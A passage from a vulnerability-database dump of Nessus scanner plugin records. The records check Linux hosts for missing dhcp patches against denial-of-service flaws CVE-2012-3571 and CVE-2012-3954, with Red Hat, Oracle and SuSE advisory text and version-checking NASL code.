exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"dhclient-3.0.5-31.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"dhcp-3.0.5-31.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"dhcp-debuginfo-3.0.5-31.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"dhcp-devel-3.0.5-31.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libdhcp4client-3.0.5-31.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libdhcp4client-devel-3.0.5-31.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhclient / dhcp / dhcp-debuginfo / dhcp-devel / libdhcp4client / etc\");\n}\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T12:47:05", "description": "From Red Hat Security Advisory 2012:1140 :\n\nUpdated dhcp packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nA denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw\nto send a specially crafted request to dhcpd, possibly causing it to\nenter an infinite loop and consume an excessive amount of CPU time.\n(CVE-2012-3571)\n\nUpstream acknowledges Markus Hietava of the Codenomicon CROSS project\nas the original reporter of this issue.\n\nUsers of DHCP should upgrade to these updated packages, which contain\na backported patch to correct this issue. After installing this\nupdate, all DHCP servers will be restarted automatically.", "edition": 21, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : dhcp (ELSA-2012-1140)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3571"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:libdhcp4client", "p-cpe:/a:oracle:linux:libdhcp4client-devel", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:dhcp", "p-cpe:/a:oracle:linux:dhclient", "p-cpe:/a:oracle:linux:dhcp-devel"], "id": "ORACLELINUX_ELSA-2012-1140.NASL", "href": "https://www.tenable.com/plugins/nessus/68593", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:1140 and \n# Oracle Linux Security Advisory ELSA-2012-1140 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68593);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-3571\");\n script_bugtraq_id(54665);\n script_xref(name:\"RHSA\", value:\"2012:1140\");\n\n script_name(english:\"Oracle Linux 5 : dhcp (ELSA-2012-1140)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:1140 :\n\nUpdated dhcp packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nA denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw\nto send a specially crafted request to dhcpd, possibly causing it to\nenter an infinite loop and consume an excessive amount of CPU time.\n(CVE-2012-3571)\n\nUpstream acknowledges Markus Hietava of the Codenomicon CROSS project\nas the original reporter of this issue.\n\nUsers of DHCP should upgrade to these updated packages, which contain\na backported patch to correct this issue. After installing this\nupdate, all DHCP servers will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-August/002971.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dhclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libdhcp4client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libdhcp4client-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/07/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"dhclient-3.0.5-31.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"dhcp-3.0.5-31.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"dhcp-devel-3.0.5-31.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"libdhcp4client-3.0.5-31.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"libdhcp4client-devel-3.0.5-31.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhclient / dhcp / dhcp-devel / libdhcp4client / etc\");\n}\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T13:11:01", "description": "Updated dhcp packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nA denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw\nto send a specially crafted request to dhcpd, possibly causing it to\nenter an infinite loop and consume an excessive amount of CPU time.\n(CVE-2012-3571)\n\nUpstream acknowledges Markus Hietava of the Codenomicon CROSS project\nas the original reporter of this issue.\n\nUsers of DHCP should upgrade to these updated packages, which contain\na backported patch to correct this issue. After installing this\nupdate, all DHCP servers will be restarted automatically.", "edition": 24, "published": "2012-08-03T00:00:00", "title": "RHEL 5 : dhcp (RHSA-2012:1140)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3571"], "modified": "2012-08-03T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:dhclient", "p-cpe:/a:redhat:enterprise_linux:libdhcp4client-devel", "p-cpe:/a:redhat:enterprise_linux:dhcp-devel", "p-cpe:/a:redhat:enterprise_linux:libdhcp4client", "p-cpe:/a:redhat:enterprise_linux:dhcp-debuginfo", "p-cpe:/a:redhat:enterprise_linux:dhcp"], "id": "REDHAT-RHSA-2012-1140.NASL", "href": "https://www.tenable.com/plugins/nessus/61404", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:1140. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61404);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-3571\");\n script_bugtraq_id(54665);\n script_xref(name:\"RHSA\", value:\"2012:1140\");\n\n script_name(english:\"RHEL 5 : dhcp (RHSA-2012:1140)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated dhcp packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nA denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw\nto send a specially crafted request to dhcpd, possibly causing it to\nenter an infinite loop and consume an excessive amount of CPU time.\n(CVE-2012-3571)\n\nUpstream acknowledges Markus Hietava of the Codenomicon CROSS project\nas the original reporter of this issue.\n\nUsers of DHCP should upgrade to these updated packages, which contain\na backported patch to correct this issue. After installing this\nupdate, all DHCP servers will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.isc.org/software/dhcp/advisories/cve-2012-3571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:1140\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3571\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libdhcp4client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libdhcp4client-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:1140\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"dhclient-3.0.5-31.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"dhclient-3.0.5-31.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"dhclient-3.0.5-31.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"dhcp-3.0.5-31.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"dhcp-3.0.5-31.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"dhcp-3.0.5-31.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"dhcp-debuginfo-3.0.5-31.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"dhcp-devel-3.0.5-31.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"libdhcp4client-3.0.5-31.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"libdhcp4client-devel-3.0.5-31.el5_8.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhclient / dhcp / dhcp-debuginfo / dhcp-devel / libdhcp4client / etc\");\n }\n}\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T12:47:05", "description": "From Red Hat Security Advisory 2012:1141 :\n\nUpdated dhcp packages that fix three security issues are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nA denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw\nto send a specially crafted request to dhcpd, possibly causing it to\nenter an infinite loop and consume an excessive amount of CPU time.\n(CVE-2012-3571)\n\nTwo memory leak flaws were found in the dhcpd daemon. A remote\nattacker could use these flaws to cause dhcpd to exhaust all available\nmemory by sending a large number of DHCP requests. (CVE-2012-3954)\n\nUpstream acknowledges Markus Hietava of the Codenomicon CROSS project\nas the original reporter of CVE-2012-3571, and Glen Eustace of Massey\nUniversity, New Zealand, as the original reporter of CVE-2012-3954.\n\nUsers of DHCP should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing this\nupdate, all DHCP servers will be restarted automatically.", "edition": 21, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 6 : dhcp (ELSA-2012-1141)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:dhcp", "p-cpe:/a:oracle:linux:dhclient", "p-cpe:/a:oracle:linux:dhcp-devel", "p-cpe:/a:oracle:linux:dhcp-common"], "id": "ORACLELINUX_ELSA-2012-1141.NASL", "href": "https://www.tenable.com/plugins/nessus/68594", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:1141 and \n# Oracle Linux Security Advisory ELSA-2012-1141 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68594);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-3571\", \"CVE-2012-3954\");\n script_bugtraq_id(54665);\n script_xref(name:\"RHSA\", value:\"2012:1141\");\n\n script_name(english:\"Oracle Linux 6 : dhcp (ELSA-2012-1141)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:1141 :\n\nUpdated dhcp packages that fix three security issues are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nA denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw\nto send a specially crafted request to dhcpd, possibly causing it to\nenter an infinite loop and consume an excessive amount of CPU time.\n(CVE-2012-3571)\n\nTwo memory leak flaws were found in the dhcpd daemon. A remote\nattacker could use these flaws to cause dhcpd to exhaust all available\nmemory by sending a large number of DHCP requests. (CVE-2012-3954)\n\nUpstream acknowledges Markus Hietava of the Codenomicon CROSS project\nas the original reporter of CVE-2012-3571, and Glen Eustace of Massey\nUniversity, New Zealand, as the original reporter of CVE-2012-3954.\n\nUsers of DHCP should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing this\nupdate, all DHCP servers will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-August/002970.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dhclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dhcp-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/07/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"dhclient-4.1.1-31.P1.0.1.el6_3.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"dhcp-4.1.1-31.P1.0.1.el6_3.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"dhcp-common-4.1.1-31.P1.0.1.el6_3.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"dhcp-devel-4.1.1-31.P1.0.1.el6_3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhclient / dhcp / dhcp-common / dhcp-devel\");\n}\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-20T15:14:04", "description": "This update of dhcp fixed two security vulnerabilities :\n\n - Malformed client identifiers could cause a Denial of\n Service (excessive CPU consumption), effectively causing\n further client requests to not be processed anymore.\n (CVE-2012-3571)\n\n - Two unspecified memory leaks. (CVE-2012-3954)", "edition": 17, "published": "2012-08-20T00:00:00", "title": "SuSE 10 Security Update : dhcp (ZYPP Patch Number 8245)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "modified": "2012-08-20T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_DHCP-8245.NASL", "href": "https://www.tenable.com/plugins/nessus/61595", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61595);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-3571\", \"CVE-2012-3954\");\n\n script_name(english:\"SuSE 10 Security Update : dhcp (ZYPP Patch Number 8245)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of dhcp fixed two security vulnerabilities :\n\n - Malformed client identifiers could cause a Denial of\n Service (excessive CPU consumption), effectively causing\n further client requests to not be processed anymore.\n (CVE-2012-3571)\n\n - Two unspecified memory leaks. (CVE-2012-3954)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-3571.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-3954.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8245.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 